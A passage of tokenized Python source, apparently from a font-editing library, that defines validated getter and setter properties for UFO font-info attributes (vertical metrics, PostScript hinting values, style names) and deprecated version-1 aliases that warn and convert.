_openTypeVheaCaretOffset <EOL> def _set_openTypeVheaCaretOffset ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretOffset = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretOffset = value <EOL> self . dirty = True <EOL> openTypeVheaCaretOffset = property ( _get_openTypeVheaCaretOffset , _set_openTypeVheaCaretOffset , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretSlopeRise ( self ) : <EOL> return self . _openTypeVheaCaretSlopeRise <EOL> def _set_openTypeVheaCaretSlopeRise ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretSlopeRise = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretSlopeRise = value <EOL> self . dirty = True <EOL> openTypeVheaCaretSlopeRise = property ( _get_openTypeVheaCaretSlopeRise , _set_openTypeVheaCaretSlopeRise , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaCaretSlopeRun ( self ) : <EOL> return self . _openTypeVheaCaretSlopeRun <EOL> def _set_openTypeVheaCaretSlopeRun ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaCaretSlopeRun = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaCaretSlopeRun = value <EOL> self . dirty = True <EOL> openTypeVheaCaretSlopeRun = property ( _get_openTypeVheaCaretSlopeRun , _set_openTypeVheaCaretSlopeRun , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoAscender ( self ) : <EOL> return self . _openTypeVheaVertTypoAscender <EOL> def _set_openTypeVheaVertTypoAscender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoAscender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoAscender = value <EOL> self . dirty = True <EOL> openTypeVheaVertTypoAscender = property ( _get_openTypeVheaVertTypoAscender , _set_openTypeVheaVertTypoAscender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoDescender ( self ) : <EOL> return self . _openTypeVheaVertTypoDescender <EOL> def _set_openTypeVheaVertTypoDescender ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoDescender = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoDescender = value <EOL> self . dirty = True <EOL> openTypeVheaVertTypoDescender = property ( _get_openTypeVheaVertTypoDescender , _set_openTypeVheaVertTypoDescender , doc = "<STR_LIT>" ) <EOL> def _get_openTypeVheaVertTypoLineGap ( self ) : <EOL> return self . _openTypeVheaVertTypoLineGap <EOL> def _set_openTypeVheaVertTypoLineGap ( self , value ) : <EOL> if value is None : <EOL> self . _openTypeVheaVertTypoLineGap = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _openTypeVheaVertTypoLineGap = value <EOL> self . dirty = True <EOL> openTypeVheaVertTypoLineGap = property ( _get_openTypeVheaVertTypoLineGap , _set_openTypeVheaVertTypoLineGap , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueFuzz ( self ) : <EOL> return self . _postscriptBlueFuzz <EOL> def _set_postscriptBlueFuzz ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueFuzz = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueFuzz = value <EOL> self . dirty = True <EOL> postscriptBlueFuzz = property ( _get_postscriptBlueFuzz , _set_postscriptBlueFuzz , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueScale ( self ) : <EOL> return self . _postscriptBlueScale <EOL> def _set_postscriptBlueScale ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueScale = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueScale = value <EOL> self . dirty = True <EOL> postscriptBlueScale = property ( _get_postscriptBlueScale , _set_postscriptBlueScale , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueShift ( self ) : <EOL> return self . _postscriptBlueShift <EOL> def _set_postscriptBlueShift ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueShift = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueShift = value <EOL> self . dirty = True <EOL> postscriptBlueShift = property ( _get_postscriptBlueShift , _set_postscriptBlueShift , doc = "<STR_LIT>" ) <EOL> def _get_postscriptBlueValues ( self ) : <EOL> if self . _postscriptBlueValues is None : <EOL> return [ ] <EOL> return self . _postscriptBlueValues <EOL> def _set_postscriptBlueValues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptBlueValues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptBlueValues = value <EOL> self . dirty = True <EOL> postscriptBlueValues = property ( _get_postscriptBlueValues , _set_postscriptBlueValues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptDefaultCharacter ( self ) : <EOL> return self . _postscriptDefaultCharacter <EOL> def _set_postscriptDefaultCharacter ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptDefaultCharacter = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptDefaultCharacter = value <EOL> self . dirty = True <EOL> postscriptDefaultCharacter = property ( _get_postscriptDefaultCharacter , _set_postscriptDefaultCharacter , doc = "<STR_LIT>" ) <EOL> def _get_postscriptDefaultWidthX ( self ) : <EOL> return self . _postscriptDefaultWidthX <EOL> def _set_postscriptDefaultWidthX ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptDefaultWidthX = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptDefaultWidthX = value <EOL> self . dirty = True <EOL> postscriptDefaultWidthX = property ( _get_postscriptDefaultWidthX , _set_postscriptDefaultWidthX , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFamilyBlues ( self ) : <EOL> if self . _postscriptFamilyBlues is None : <EOL> return [ ] <EOL> return self . _postscriptFamilyBlues <EOL> def _set_postscriptFamilyBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFamilyBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFamilyBlues = value <EOL> self . dirty = True <EOL> postscriptFamilyBlues = property ( _get_postscriptFamilyBlues , _set_postscriptFamilyBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFamilyOtherBlues ( self ) : <EOL> if self . _postscriptFamilyOtherBlues is None : <EOL> return [ ] <EOL> return self . _postscriptFamilyOtherBlues <EOL> def _set_postscriptFamilyOtherBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFamilyOtherBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFamilyOtherBlues = value <EOL> self . dirty = True <EOL> postscriptFamilyOtherBlues = property ( _get_postscriptFamilyOtherBlues , _set_postscriptFamilyOtherBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFontName ( self ) : <EOL> return self . _postscriptFontName <EOL> def _set_postscriptFontName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFontName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFontName = value <EOL> self . dirty = True <EOL> postscriptFontName = property ( _get_postscriptFontName , _set_postscriptFontName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptForceBold ( self ) : <EOL> return self . _postscriptForceBold <EOL> def _set_postscriptForceBold ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptForceBold = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptForceBold = value <EOL> self . dirty = True <EOL> postscriptForceBold = property ( _get_postscriptForceBold , _set_postscriptForceBold , doc = "<STR_LIT>" ) <EOL> def _get_postscriptFullName ( self ) : <EOL> return self . _postscriptFullName <EOL> def _set_postscriptFullName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptFullName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptFullName = value <EOL> self . dirty = True <EOL> postscriptFullName = property ( _get_postscriptFullName , _set_postscriptFullName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptIsFixedPitch ( self ) : <EOL> return self . _postscriptIsFixedPitch <EOL> def _set_postscriptIsFixedPitch ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptIsFixedPitch = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptIsFixedPitch = value <EOL> self . dirty = True <EOL> postscriptIsFixedPitch = property ( _get_postscriptIsFixedPitch , _set_postscriptIsFixedPitch , doc = "<STR_LIT>" ) <EOL> def _get_postscriptNominalWidthX ( self ) : <EOL> return self . _postscriptNominalWidthX <EOL> def _set_postscriptNominalWidthX ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptNominalWidthX = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptNominalWidthX = value <EOL> self . dirty = True <EOL> postscriptNominalWidthX = property ( _get_postscriptNominalWidthX , _set_postscriptNominalWidthX , doc = "<STR_LIT>" ) <EOL> def _get_postscriptOtherBlues ( self ) : <EOL> if self . _postscriptOtherBlues is None : <EOL> return [ ] <EOL> return self . _postscriptOtherBlues <EOL> def _set_postscriptOtherBlues ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptOtherBlues = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptOtherBlues = value <EOL> self . dirty = True <EOL> postscriptOtherBlues = property ( _get_postscriptOtherBlues , _set_postscriptOtherBlues , doc = "<STR_LIT>" ) <EOL> def _get_postscriptSlantAngle ( self ) : <EOL> return self . _postscriptSlantAngle <EOL> def _set_postscriptSlantAngle ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptSlantAngle = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptSlantAngle = value <EOL> self . dirty = True <EOL> postscriptSlantAngle = property ( _get_postscriptSlantAngle , _set_postscriptSlantAngle , doc = "<STR_LIT>" ) <EOL> def _get_postscriptStemSnapH ( self ) : <EOL> if self . _postscriptStemSnapH is None : <EOL> return [ ] <EOL> return self . _postscriptStemSnapH <EOL> def _set_postscriptStemSnapH ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptStemSnapH = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptStemSnapH = value <EOL> self . dirty = True <EOL> postscriptStemSnapH = property ( _get_postscriptStemSnapH , _set_postscriptStemSnapH , doc = "<STR_LIT>" ) <EOL> def _get_postscriptStemSnapV ( self ) : <EOL> if self . _postscriptStemSnapV is None : <EOL> return [ ] <EOL> return self . _postscriptStemSnapV <EOL> def _set_postscriptStemSnapV ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptStemSnapV = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptStemSnapV = value <EOL> self . dirty = True <EOL> postscriptStemSnapV = property ( _get_postscriptStemSnapV , _set_postscriptStemSnapV , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUnderlinePosition ( self ) : <EOL> return self . _postscriptUnderlinePosition <EOL> def _set_postscriptUnderlinePosition ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUnderlinePosition = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUnderlinePosition = value <EOL> self . dirty = True <EOL> postscriptUnderlinePosition = property ( _get_postscriptUnderlinePosition , _set_postscriptUnderlinePosition , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUnderlineThickness ( self ) : <EOL> return self . _postscriptUnderlineThickness <EOL> def _set_postscriptUnderlineThickness ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUnderlineThickness = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUnderlineThickness = value <EOL> self . dirty = True <EOL> postscriptUnderlineThickness = property ( _get_postscriptUnderlineThickness , _set_postscriptUnderlineThickness , doc = "<STR_LIT>" ) <EOL> def _get_postscriptUniqueID ( self ) : <EOL> return self . _postscriptUniqueID <EOL> def _set_postscriptUniqueID ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptUniqueID = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptUniqueID = value <EOL> self . dirty = True <EOL> postscriptUniqueID = property ( _get_postscriptUniqueID , _set_postscriptUniqueID , doc = "<STR_LIT>" ) <EOL> def _get_postscriptWeightName ( self ) : <EOL> return self . _postscriptWeightName <EOL> def _set_postscriptWeightName ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptWeightName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptWeightName = value <EOL> self . dirty = True <EOL> postscriptWeightName = property ( _get_postscriptWeightName , _set_postscriptWeightName , doc = "<STR_LIT>" ) <EOL> def _get_postscriptWindowsCharacterSet ( self ) : <EOL> return self . _postscriptWindowsCharacterSet <EOL> def _set_postscriptWindowsCharacterSet ( self , value ) : <EOL> if value is None : <EOL> self . _postscriptWindowsCharacterSet = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _postscriptWindowsCharacterSet = value <EOL> self . dirty = True <EOL> postscriptWindowsCharacterSet = property ( _get_postscriptWindowsCharacterSet , _set_postscriptWindowsCharacterSet , doc = "<STR_LIT>" ) <EOL> def _get_styleMapFamilyName ( self ) : <EOL> return self . _styleMapFamilyName <EOL> def _set_styleMapFamilyName ( self , value ) : <EOL> if value is None : <EOL> self . _styleMapFamilyName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleMapFamilyName = value <EOL> self . dirty = True <EOL> styleMapFamilyName = property ( _get_styleMapFamilyName , _set_styleMapFamilyName , doc = "<STR_LIT>" ) <EOL> def _get_styleMapStyleName ( self ) : <EOL> return self . _styleMapStyleName <EOL> def _set_styleMapStyleName ( self , value ) : <EOL> if value is None : <EOL> self . _styleMapStyleName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleMapStyleName = value <EOL> self . dirty = True <EOL> styleMapStyleName = property ( _get_styleMapStyleName , _set_styleMapStyleName , doc = "<STR_LIT>" ) <EOL> def _get_styleName ( self ) : <EOL> return self . _styleName <EOL> def _set_styleName ( self , value ) : <EOL> if value is None : <EOL> self . _styleName = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _styleName = value <EOL> self . dirty = True <EOL> styleName = property ( _get_styleName , _set_styleName , doc = "<STR_LIT>" ) <EOL> def _get_trademark ( self ) : <EOL> return self . _trademark <EOL> def _set_trademark ( self , value ) : <EOL> if value is None : <EOL> self . _trademark = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _trademark = value <EOL> self . dirty = True <EOL> trademark = property ( _get_trademark , _set_trademark , doc = "<STR_LIT>" ) <EOL> def _get_unitsPerEm ( self ) : <EOL> return self . _unitsPerEm <EOL> def _set_unitsPerEm ( self , value ) : <EOL> if value is None : <EOL> self . _unitsPerEm = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _unitsPerEm = value <EOL> self . dirty = True <EOL> unitsPerEm = property ( _get_unitsPerEm , _set_unitsPerEm , doc = "<STR_LIT>" ) <EOL> def _get_versionMajor ( self ) : <EOL> return self . _versionMajor <EOL> def _set_versionMajor ( self , value ) : <EOL> if value is None : <EOL> self . _versionMajor = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _versionMajor = value <EOL> self . dirty = True <EOL> versionMajor = property ( _get_versionMajor , _set_versionMajor , doc = "<STR_LIT>" ) <EOL> def _get_versionMinor ( self ) : <EOL> return self . _versionMinor <EOL> def _set_versionMinor ( self , value ) : <EOL> if value is None : <EOL> self . _versionMinor = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _versionMinor = value <EOL> self . dirty = True <EOL> versionMinor = property ( _get_versionMinor , _set_versionMinor , doc = "<STR_LIT>" ) <EOL> def _get_xHeight ( self ) : <EOL> return self . _xHeight <EOL> def _set_xHeight ( self , value ) : <EOL> if value is None : <EOL> self . _xHeight = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _xHeight = value <EOL> self . dirty = True <EOL> xHeight = property ( _get_xHeight , _set_xHeight , doc = "<STR_LIT>" ) <EOL> def _get_year ( self ) : <EOL> return self . _year <EOL> def _set_year ( self , value ) : <EOL> if value is None : <EOL> self . _year = None <EOL> else : <EOL> valid = ufoLib . validateFontInfoVersion2ValueForAttribute ( "<STR_LIT>" , value ) <EOL> if not valid : <EOL> raise ValueError ( "<STR_LIT>" % repr ( value ) ) <EOL> else : <EOL> self . _year = value <EOL> self . dirty = True <EOL> year = property ( _get_year , _set_year , doc = "<STR_LIT>" ) <EOL> def _get_createdBy ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_createdBy ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> createdBy = property ( _get_createdBy , _set_createdBy ) <EOL> def _get_defaultWidth ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_defaultWidth ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> defaultWidth = property ( _get_defaultWidth , _set_defaultWidth ) <EOL> def _get_designer ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_designer ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> designer = property ( _get_designer , _set_designer ) <EOL> def _get_designerURL ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_designerURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> designerURL = property ( _get_designerURL , _set_designerURL ) <EOL> def _get_fondID ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fondID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fondID = property ( _get_fondID , _set_fondID ) <EOL> def _get_fondName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fondName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fondName = property ( _get_fondName , _set_fondName ) <EOL> def _get_fontName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fontName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fontName = property ( _get_fontName , _set_fontName ) <EOL> def _get_fontStyle ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fontStyle ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fontStyle = property ( _get_fontStyle , _set_fontStyle ) <EOL> def _get_fullName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_fullName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> fullName = property ( _get_fullName , _set_fullName ) <EOL> def _get_license ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_license ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> license = property ( _get_license , _set_license ) <EOL> def _get_licenseURL ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_licenseURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> licenseURL = property ( _get_licenseURL , _set_licenseURL ) <EOL> def _get_menuName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_menuName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> menuName = property ( _get_menuName , _set_menuName ) <EOL> def _get_msCharSet ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_msCharSet ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> msCharSet = property ( _get_msCharSet , _set_msCharSet ) <EOL> def _get_notice ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_notice ( self , value ) : <EOL> newAttr , newValue = ufoLib . 